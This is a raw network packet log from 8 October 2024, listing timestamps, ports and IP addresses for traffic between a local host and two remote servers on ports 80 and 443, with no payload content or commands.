Oct 8, 2024 20:47:40.577955961 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.577972889 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.577997923 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578008890 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578026056 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578057051 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578088999 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578121901 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578155994 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578174114 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578188896 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578207970 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578222990 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578248024 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578274012 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578469992 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578501940 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578530073 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578537941 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578547955 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578571081 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578593016 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578623056 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578629017 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578655958 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578679085 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578691006 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578713894 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578722954 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578744888 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578759909 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578778982 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578810930 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578814030 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578844070 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578875065 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578876019 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578895092 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578907967 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578931093 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578943014 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578954935 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.578977108 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.578989029 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579010010 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579026937 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579041958 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579060078 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579075098 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579093933 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579108000 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579133987 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579140902 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579157114 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579195976 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579200029 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579246044 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579252005 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579278946 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579293966 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579313040 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579332113 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579344988 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579428911 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579466105 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579505920 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579535007 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579541922 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579566002 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579585075 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579586983 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579617977 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579634905 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579648972 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579674006 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579687119 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579709053 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579719067 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579736948 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579752922 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579765081 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579785109 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579803944 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579821110 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579838037 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579853058 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579874039 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579886913 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579901934 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579936981 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579937935 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.579971075 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.579988003 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580003977 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580037117 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580055952 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580069065 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580096960 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580101967 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580126047 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580135107 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580154896 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580168009 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580185890 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580200911 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580224991 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580240011 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580255032 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580271959 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580290079 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580306053 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580327988 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580334902 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580365896 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580368042 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580384016 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580399990 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580434084 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580447912 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580466032 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580481052 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580513954 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.580517054 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580549955 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.580612898 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.587923050 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.588064909 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.588135958 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.588195086 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.588195086 CEST	49879	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.588217020 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.588238001 CEST	443	49879	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.590377092 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.590416908 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.590573072 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.590679884 CEST	49883	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.590707064 CEST	443	49883	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.593403101 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.593507051 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.593538046 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.593600035 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.593641043 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.593641043 CEST	49877	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.593660116 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.593687057 CEST	443	49877	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.595585108 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.595607996 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.595798016 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.595798016 CEST	49884	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.595819950 CEST	443	49884	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.621788025 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.622101068 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.622164965 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.622200012 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.622235060 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.622267008 CEST	49880	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.622282028 CEST	443	49880	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.624022007 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.624083042 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.624171972 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.624284029 CEST	49885	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:40.624316931 CEST	443	49885	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:40.660470009 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660523891 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660537004 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660572052 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660576105 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660610914 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660630941 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660645008 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660665989 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660697937 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660700083 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660728931 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660753012 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660763979 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660789967 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660799026 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660819054 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660849094 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660856962 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660877943 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660904884 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660913944 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660928011 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660945892 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660964966 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.660980940 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.660999060 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.661009073 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.661031008 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.661058903 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664115906 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664169073 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664175987 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664221048 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664223909 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664256096 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664279938 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664289951 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664314032 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664323092 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664349079 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664375067 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664382935 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664410114 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664424896 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664448023 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664459944 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664484024 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664509058 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664513111 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664531946 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664547920 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664558887 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664581060 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664597034 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664617062 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664618015 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664650917 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664669991 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664699078 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.664704084 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.664784908 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.669893026 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.669945002 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.669964075 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.669976950 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.669990063 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670011997 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670037985 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670046091 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670061111 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670092106 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670133114 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670166969 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670201063 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670205116 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670236111 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670238972 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670262098 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670284033 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670331001 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670362949 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670396090 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670413017 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670429945 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670449972 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670463085 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670474052 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670497894 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670551062 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670569897 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670584917 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670598984 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670619011 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670635939 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670651913 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670675039 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670685053 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670711994 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670731068 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670768023 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670816898 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670816898 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670850992 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670865059 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670882940 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670901060 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670917034 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670949936 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.670967102 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.670984030 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671001911 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671017885 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671032906 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671082020 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671124935 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671156883 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671175003 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671190023 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671211004 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671224117 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671245098 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671276093 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671304941 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671327114 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671353102 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671356916 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671432018 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671623945 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671655893 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671685934 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671705961 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671706915 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671741009 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671761036 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671773911 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671797037 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671808958 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671828032 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671842098 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671864033 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671874046 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671895981 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671907902 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671928883 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671941042 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671962023 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.671982050 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.671993971 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672015905 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672029972 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672049999 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672064066 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672084093 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672095060 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672116995 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672151089 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672180891 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672183990 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672202110 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672219992 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672229052 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672254086 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672281981 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672288895 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672298908 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672322989 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672339916 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672374964 CEST	49875	80	192.168.2.5	147.45.44.104
Oct 8, 2024 20:47:40.672418118 CEST	80	49875	147.45.44.104	192.168.2.5
Oct 8, 2024 20:47:40.672450066 CEST	80	49875	147.45.44.104	192.168.2.5
